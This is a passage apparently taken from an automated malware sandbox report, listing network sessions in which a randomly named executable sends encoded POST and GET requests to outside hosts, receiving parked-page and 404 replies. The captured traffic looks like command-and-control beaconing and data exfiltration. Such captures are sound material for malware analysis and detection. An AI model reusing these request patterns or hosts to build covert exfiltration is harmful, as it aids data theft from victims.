7	192.168.2.5	49719	208.91.197.27	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:43:26.614162922 CEST	1825	OUT	POST /xzzi/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.bfiworkerscomp.com Origin: http://www.bfiworkerscomp.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Referer: http://www.bfiworkerscomp.com/xzzi/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 37 64 62 66 6d 4d 4f 31 46 65 59 2b 6c 47 38 38 6b 66 57 76 74 56 55 38 77 6d 42 2b 57 35 4a 6f 63 6d 71 36 78 63 36 4c 4a 58 74 7a 70 66 31 54 50 56 6a 79 4a 37 51 4c 56 54 36 78 67 69 4c 48 67 72 4e 75 7a 45 7a 35 66 70 70 44 63 51 5a 73 7a 6b 4f 51 63 62 78 30 34 76 31 55 64 5a 30 30 68 4a 39 59 6e 48 68 4d 61 30 53 41 58 4a 37 5a 50 6b 4c 48 64 30 4a 72 61 68 43 39 64 31 61 34 4c 5a 79 46 69 64 62 53 6f 6b 74 67 73 2f 53 62 71 74 78 2b 47 36 76 2b 50 42 65 41 61 48 4f 71 54 63 7a 61 48 2f 53 50 70 49 71 59 75 47 78 4f 68 70 34 53 37 38 78 66 4e 63 36 4d 69 74 58 75 41 39 79 68 66 58 67 77 70 71 2f 35 62 34 5a 41 73 69 31 4c 61 68 2b 63 58 59 61 54 76 65 55 6f 4b 46 43 38 41 51 52 66 48 4a 51 69 53 57 38 4b 4c 43 71 61 4b 62 4d 4b 36 4e 51 39 79 2b 61 64 69 4b 44 57 78 63 6c 4a 43 54 57 46 6d 63 71 46 79 48 52 77 54 6b 62 38 41 53 69 35 45 57 30 49 6e 68 37 34 73 43 6b 49 74 61 45 70 47 55 6f 34 76 6b 47 58 4c 52 30 49 50 47 54 54 74 31 56 4a 7a 72 57 [TRUNCATED] Data Ascii: jN=wA7ycEIu+ovI7dbfmMO1FeY+lG88kfWvtVU8wmB+W5Jocmq6xc6LJXtzpf1TPVjyJ7QLVT6xgiLHgrNuzEz5fppDcQZszkOQcbx04v1UdZ00hJ9YnHhMa0SAXJ7ZPkLHd0JrahC9d1a4LZyFidbSoktgs/Sbqtx+G6v+PBeAaHOqTczaH/SPpIqYuGxOhp4S78xfNc6MitXuA9yhfXgwpq/5b4ZAsi1Lah+cXYaTveUoKFC8AQRfHJQiSW8KLCqaKbMK6NQ9y+adiKDWxclJCTWFmcqFyHRwTkb8ASi5EW0Inh74sCkItaEpGUo4vkGXLR0IPGTTt1VJzrW2fLpTqbl6QU2cdsAN1NpjsWl++svj7ffKXbX8K3XTiPGoLLKLskMO9UO/wVhYzPqvZkyYXdGcE6UIlYklorxCXI9z3bUZ6AaMaXK0c4fpQ9OjEjob1k+rFLCmm4kvmvaCZb72/zL6r25+dlUipUtSjJWSPkvCLj7tR38QqWCSypUfUe10H0nZONwQoezU0lhlHeEKAa3BWh3fHS7ui+FZ8dDhKe3pz5n5QlmeEO3SEx6P0w9BrKc/eJxrEubDKEk/bi/xTNXL2qd0wTejIXTB0hFOCuXJoED4NVBzUPdyDbrIXNNLLEd+jQ41ORLEVk4+OKGmWb1wFNG8ColbXxWSIU4XNjurRU3+O2Ku5kk0ZyI51P7tYuhyW8zGcos3d5U2+UjfDOgUj+ZrMoPPN9oxCBp2c5gYce3Xc1lySKyzniumTANAV26a0SkZ5jXbxaBVD46sBZ4M3u/ztJPWW6FLDLRre6Gc/y+L/TI/S9yn2hk+aMNHpu4WWb6Qf9LRkb++vmpa9XNv9Ol5Oi4hV3o1ioWQYBiW1IaFrGL3y192e9tE6kyL7kFqs2FK4JpI365zqCPlKixmMbHB04DYWqKSVzJqxYL1bTPNzurYRxhGfL4wEjN99XmeLZR1xF6mHGBcEf2eeEC5WVimeFn2AXKOlauyE6cnHD8sJ [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49720	208.91.197.27	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:43:29.145206928 CEST	517	OUT	GET /xzzi/?uXTT=8FDHY8dP&jN=9CTSfwlM5YWl8fva1LSaXKM8r2QUgbHW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/U7l2GiVWxU2JTINSgPIAJ4NvupNBog1mPljiQYHOMEGLOA== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.bfiworkerscomp.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 13, 2024 06:43:30.163675070 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 13 Aug 2024 04:43:10 GMT Server: Apache Referrer-Policy: no-referrer-when-downgrade Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com") Set-Cookie: vsid=926vr471069790411951911; expires=Sun, 12-Aug-2029 04:43:10 GMT; Max-Age=157680000; path=/; domain=www.bfiworkerscomp.com; HttpOnly Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Connection: close Data Raw: 34 30 36 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44 46 45 54 58 52 6e 30 48 72 30 35 66 55 50 37 45 4a 54 37 37 78 59 6e 50 6d 52 62 70 4d 79 34 76 6b 38 4b 59 69 48 6e 6b 4e 70 65 64 6e 6a 4f 41 4e 4a 63 61 58 44 58 63 4b 51 4a 4e 30 6e 58 4b 5a 4a 4c 37 54 63 69 4a 44 38 41 6f 48 58 4b 31 35 38 43 41 77 45 41 41 51 3d 3d 5f 6b 39 76 58 4a 47 35 72 76 46 72 68 58 43 50 2b 54 2f 70 59 64 66 4d 61 77 79 55 6d 42 4b 61 41 4e 38 79 45 2f 42 63 4e 79 31 42 53 2b 74 6a 70 2b 4a 46 55 64 43 39 4f 31 44 57 73 46 75 2b 48 53 4a 79 6b 64 46 51 45 46 6a 48 62 58 41 32 4c 59 43 77 6e 45 41 3d 3d 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 [TRUNCATED] Data Ascii: 406c<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_k9vXJG5rvFrhXCP+T/pYdfMawyUmBKaAN8yE/BcNy1BS+tjp+JFUdC9O1DWsFu+HSJykdFQEFjHbXA2LYCwnEA==" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-
Aug 13, 2024 06:43:30.163696051 CEST	1236	IN	Data Raw: 74 6f 2d 66 69 74 3d 6e 6f 22 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 62 66 69 77 6f 72 6b 65 72 73 63 6f 6d 70 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 2e 61 73 73 Data Ascii: to-fit=no"/> <title>bfiworkerscomp.com</title> <style media="screen">.asset_star0 {background: url('//d38psrni17bvxu.cloudfront.net/themes/assets/star0.gif') no-repeat center;width: 13px;height: 12px;display: inline-block;}
Aug 13, 2024 06:43:30.163708925 CEST	1236	IN	Data Raw: 6e 67 3a 31 72 65 6d 20 31 72 65 6d 20 30 3b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 Data Ascii: ng:1rem 1rem 0; overflow:hidden;}h1 { color:#848484; font-size:1.5rem;}.header-text-color:visited,.header-text-color:link,.header-text-color { color:#848484;}.comp-is-parked { margin: 4px 0 2px;}.comp-sponsored
Aug 13, 2024 06:43:30.163815975 CEST	1236	IN	Data Raw: 38 34 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 63 6f 6d 70 2d 73 70 6f 6e 73 6f 72 65 64 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 77 72 61 70 70 65 72 31 20 7b 0a 20 20 20 20 Data Ascii: 84; } .comp-sponsored { margin-left: 0; } .wrapper1 { max-width:1500px; margin-left:auto; margin-right:auto; } .wrapper2 { background:url('//d38psrni17bvxu.cloudfront.net/themes/
Aug 13, 2024 06:43:30.163825989 CEST	896	IN	Data Raw: 4a 4e 4d 43 41 77 61 44 49 30 64 6a 49 30 53 44 42 36 49 69 42 6d 61 57 78 73 50 53 4a 75 62 32 35 6c 49 69 38 2b 50 48 42 68 64 47 67 67 5a 44 30 69 54 54 55 75 4f 44 67 67 4e 43 34 78 4d 6b 77 78 4d 79 34 33 4e 69 41 78 4d 6d 77 74 4e 79 34 34 Data Ascii: JNMCAwaDI0djI0SDB6IiBmaWxsPSJub25lIi8+PHBhdGggZD0iTTUuODggNC4xMkwxMy43NiAxMmwtNy44OCA3Ljg4TDggMjJsMTAtMTBMOCAyeiIvPjwvc3ZnPg==');}</style> </head><body id="afd"><div class="wrapper1"> <div class="wrapper2"> <div c
Aug 13, 2024 06:43:30.163839102 CEST	1236	IN	Data Raw: 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 3b 22 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 2d 74 65 78 74 2d 63 6f 6c 6f 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 54 68 69 73 20 50 61 67 65 20 49 73 20 55 6e 64 65 72 20 43 6f 6e 73 74 72 75 63 74 Data Ascii: -size: small;" class="header-text-color"> This Page Is Under Construction - Coming Soon! <br> <a class="header-text-color" target="_blank" href="//bfiworkerscomp.com/__media__/design/underconstructionnotice.php?d=bfiwor
Aug 13, 2024 06:43:30.163851976 CEST	1236	IN	Data Raw: 62 72 2f 3e 3c 62 72 2f 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e Data Ascii: br/><br/> </div></div><script type="text/javascript" language="JavaScript"> var tcblock = { // Required and steady 'container': 'tc', 'type': 'relatedsearch', 'colorBackground': 'transparent',
Aug 13, 2024 06:43:30.163862944 CEST	1236	IN	Data Raw: 44 46 68 4e 54 55 31 4f 57 59 33 4e 54 5a 69 4d 44 63 78 5a 57 55 79 4d 32 51 79 5a 6a 42 6c 59 7a 67 35 5a 44 41 31 4f 57 45 36 4e 6a 5a 69 59 57 55 30 4e 7a 49 77 4d 44 59 78 4e 67 3d 3d 27 3b 20 20 20 20 20 20 20 20 20 6c 65 74 20 73 65 61 72 Data Ascii: DFhNTU1OWY3NTZiMDcxZWUyM2QyZjBlYzg5ZDA1OWE6NjZiYWU0NzIwMDYxNg=='; let search=''; let themedata='fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fHx8fHw2NmJhZTQ3MjAwNWIyfHx8MTcyMzUyNDIxMC4wNTM1fGY2YmJkODg0MTVkYzhlOTMzNmU0MGZ
Aug 13, 2024 06:43:30.164146900 CEST	635	IN	Data Raw: 69 62 75 74 69 6f 6e 27 3a 20 31 36 2c 27 61 74 74 72 69 62 75 74 69 6f 6e 42 6f 6c 64 27 3a 20 66 61 6c 73 65 2c 27 72 6f 6c 6c 6f 76 65 72 4c 69 6e 6b 42 6f 6c 64 27 3a 20 66 61 6c 73 65 2c 27 66 6f 6e 74 46 61 6d 69 6c 79 41 74 74 72 69 62 75 Data Ascii: ibution': 16,'attributionBold': false,'rolloverLinkBold': false,'fontFamilyAttribution': 'arial','adLoadedCallback': function(containerName, adsLoaded, isExperimentVariant, callbackOptions) {let data = {containerName: containerName,adsLoaded:
Aug 13, 2024 06:43:30.171257019 CEST	1236	IN	Data Raw: 74 69 6f 6e 20 28 72 65 71 75 65 73 74 41 63 63 65 70 74 65 64 2c 20 73 74 61 74 75 73 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 20 3d 20 27 76 69 73 69 62 6c 65 27 3b 70 61 67 65 4c 6f 61 Data Ascii: tion (requestAccepted, status) {document.body.style.visibility = 'visible';pageLoadedCallbackTriggered = true;if ((status.faillisted === true \|\| status.faillisted == "true" \|\| status.blocked === true \|\| status.blocked == "true" ) && status.err
Aug 13, 2024 06:43:30.171313047 CEST	1236	IN	Data Raw: 73 74 72 61 6e 74 29 29 3b 7d 7d 69 66 20 28 73 74 61 74 75 73 2e 6e 65 65 64 73 72 65 76 69 65 77 20 3d 3d 3d 20 74 72 75 65 20 7c 7c 20 73 74 61 74 75 73 2e 6e 65 65 64 73 72 65 76 69 65 77 20 3d 3d 20 22 74 72 75 65 22 29 20 7b 61 6a 61 78 51 Data Ascii: strant));}}if (status.needsreview === true \|\| status.needsreview == "true") {ajaxQuery(scriptPath + "/track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=needsreview&uid=" + encodeURIComponent(uniqueTrackingID));}if ((status.adult

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49721	43.252.167.188	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:43:44.032542944 CEST	794	OUT	POST /rm91/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.xn--fhq1c541j0zr.com Origin: http://www.xn--fhq1c541j0zr.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Referer: http://www.xn--fhq1c541j0zr.com/rm91/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 46 51 39 4f 55 2b 34 35 30 6c 42 42 64 6a 79 59 48 6a 6f 39 48 38 38 2f 6f 48 34 55 49 52 59 57 32 68 2b 37 42 37 64 54 2f 68 52 48 33 42 62 73 58 65 78 30 70 63 4b 46 2f 54 32 52 47 5a 78 6d 68 42 79 6b 50 78 54 6a 4c 73 49 63 76 33 48 77 73 68 51 6f 2b 2f 65 61 75 73 4d 70 4b 79 43 5a 34 50 44 2f 53 72 4f 6a 70 4d 57 52 4b 46 67 53 53 41 43 5a 2b 6b 61 64 6d 6f 69 67 41 59 50 42 38 46 76 68 64 70 57 68 6a 38 36 4c 70 45 53 68 32 7a 35 73 50 69 39 46 47 38 58 34 4a 69 67 54 62 43 38 73 50 6d 30 36 66 41 71 53 74 47 6b 6e 58 73 6b 6c 4f 44 55 4f 53 33 73 3d Data Ascii: jN=uQ1boOTJ7vI9FQ9OU+450lBBdjyYHjo9H88/oH4UIRYW2h+7B7dT/hRH3BbsXex0pcKF/T2RGZxmhBykPxTjLsIcv3HwshQo+/eausMpKyCZ4PD/SrOjpMWRKFgSSACZ+kadmoigAYPB8FvhdpWhj86LpESh2z5sPi9FG8X4JigTbC8sPm06fAqStGknXsklODUOS3s=
Aug 13, 2024 06:43:44.909596920 CEST	367	IN	HTTP/1.1 404 Not Found Date: Tue, 13 Aug 2024 04:51:11 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49722	43.252.167.188	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:43:46.582683086 CEST	814	OUT	POST /rm91/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.xn--fhq1c541j0zr.com Origin: http://www.xn--fhq1c541j0zr.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Referer: http://www.xn--fhq1c541j0zr.com/rm91/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 4b 54 6c 4f 57 63 51 35 6a 56 42 4f 52 44 79 59 49 44 6f 78 48 38 77 2f 6f 47 74 4a 49 45 49 57 33 46 36 37 43 2f 42 54 38 68 52 48 38 68 62 54 5a 2b 78 2f 70 63 33 6d 2f 53 61 52 47 5a 31 6d 68 41 43 6b 4d 43 37 6b 52 63 49 61 32 6e 48 75 7a 78 51 6f 2b 2f 65 61 75 73 49 51 4b 30 71 5a 35 36 4c 2f 54 4f 79 69 33 63 57 57 65 56 67 53 57 41 43 56 2b 6b 61 2f 6d 73 37 50 41 61 48 42 38 46 66 68 54 63 6a 33 74 38 36 4e 6e 6b 54 6c 34 47 64 6f 57 68 6c 50 62 63 57 62 64 41 6f 57 65 30 52 47 56 45 38 53 4d 67 47 71 39 56 73 51 47 63 46 4d 55 67 45 2b 4d 67 35 4b 31 79 63 7a 78 75 75 7a 69 37 44 33 66 6f 50 51 79 2b 39 32 Data Ascii: jN=uQ1boOTJ7vI9KTlOWcQ5jVBORDyYIDoxH8w/oGtJIEIW3F67C/BT8hRH8hbTZ+x/pc3m/SaRGZ1mhACkMC7kRcIa2nHuzxQo+/eausIQK0qZ56L/TOyi3cWWeVgSWACV+ka/ms7PAaHB8FfhTcj3t86NnkTl4GdoWhlPbcWbdAoWe0RGVE8SMgGq9VsQGcFMUgE+Mg5K1yczxuuzi7D3foPQy+92
Aug 13, 2024 06:43:47.444407940 CEST	367	IN	HTTP/1.1 404 Not Found Date: Tue, 13 Aug 2024 04:51:14 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49723	43.252.167.188	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:43:49.114031076 CEST	1831	OUT	POST /rm91/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.xn--fhq1c541j0zr.com Origin: http://www.xn--fhq1c541j0zr.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Referer: http://www.xn--fhq1c541j0zr.com/rm91/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 4b 54 6c 4f 57 63 51 35 6a 56 42 4f 52 44 79 59 49 44 6f 78 48 38 77 2f 6f 47 74 4a 49 48 6f 57 33 77 75 37 41 65 42 54 39 68 52 48 78 42 62 57 5a 2b 78 75 70 63 66 36 2f 53 47 6e 47 63 70 6d 6a 69 36 6b 59 6a 37 6b 45 4d 49 61 35 48 48 76 73 68 51 35 2b 2f 50 54 75 74 34 51 4b 30 71 5a 35 39 37 2f 58 62 4f 69 31 63 57 52 4b 46 67 57 53 41 44 41 2b 6b 44 49 6d 73 76 6c 56 36 6e 42 6c 6c 50 68 65 4f 37 33 79 4d 36 50 6d 55 54 44 34 47 59 32 57 69 42 6c 62 66 4b 78 64 43 34 57 66 77 41 41 41 6c 30 61 52 6d 65 51 38 30 6f 4d 53 73 4a 37 62 43 38 64 44 67 55 72 38 41 73 58 78 4f 57 46 32 4a 53 37 4f 39 66 66 39 34 41 56 65 54 7a 71 45 43 6a 62 70 6c 4a 68 43 5a 6e 49 2b 2b 72 59 6d 38 77 35 52 48 31 63 4f 30 38 63 77 34 6b 7a 62 4d 37 51 72 2f 73 4a 36 6b 72 4e 30 48 4a 50 68 57 70 5a 43 2b 70 37 35 53 74 4f 62 59 50 43 35 48 59 45 32 39 41 53 47 66 74 70 39 44 4a 4e 64 72 45 43 35 53 55 38 63 61 31 58 7a 43 56 4d 36 34 4b 50 49 35 58 58 49 54 62 74 30 61 64 [TRUNCATED] Data Ascii: jN=uQ1boOTJ7vI9KTlOWcQ5jVBORDyYIDoxH8w/oGtJIHoW3wu7AeBT9hRHxBbWZ+xupcf6/SGnGcpmji6kYj7kEMIa5HHvshQ5+/PTut4QK0qZ597/XbOi1cWRKFgWSADA+kDImsvlV6nBllPheO73yM6PmUTD4GY2WiBlbfKxdC4WfwAAAl0aRmeQ80oMSsJ7bC8dDgUr8AsXxOWF2JS7O9ff94AVeTzqECjbplJhCZnI++rYm8w5RH1cO08cw4kzbM7Qr/sJ6krN0HJPhWpZC+p75StObYPC5HYE29ASGftp9DJNdrEC5SU8ca1XzCVM64KPI5XXITbt0adutcL679ckeRtG8MqNkMJ51B+GnO4W1VmiKT/QsttfoHNSTFnXp6qREOT4Nh3Dfd2UQnn5uD/J6yzt3af2OHcCjK5mgwjHCIi3hLxmE2jVfaTI3Yrz4v5YWh1u6JnSqC19+iaQoxZYvcffsyOTpy5ZY2XjIXtSa1cVOrB9K2iypg081mRxBh5m3jaG6ncHAG+f5/JSw6cJ8Whx/6A1DrO4agA79H0UhRuG6+XDEfgZNLeWTPDAQdwxjE6Cfzd71PQC0coVduQwncFCxl6lNFj0DMgK+iyk+xHL908f43fGVdQVv9BkiTBC4GXSeEAipUHT2x96V21QNJIa+j1xNtLcQlPRhl/EZRF6TzabmEMmguQiLkRzmGaXz5bFDqbpMLInR0MMyjSRxBwXRDeofsmQbPqB6+FXjXElspSKl0tiYKbdtfevMOq+YwzC9a0In5CSvb2jY/SGAAesyBIdT0HET3yOEr7M5wDOUtkYpib2VK1D1thi37x42X+eDJB4iOb1hiC/11yxyAZ9V3OWFUjkAdPXXmLzWB96FtOoEQjGRZ7i3BBWx1ztI069TqHhLFYmfkEQez1Fd533Ng+7HqOyKGoiWK+NfMfFECTvHkzZZzbvHbq5WxPmmUlbkpcAKuMrHV4jDFrE51wfTqSQhVZGtL0bpSflrmtfS [TRUNCATED]
Aug 13, 2024 06:43:49.961944103 CEST	367	IN	HTTP/1.1 404 Not Found Date: Tue, 13 Aug 2024 04:51:16 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49724	43.252.167.188	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
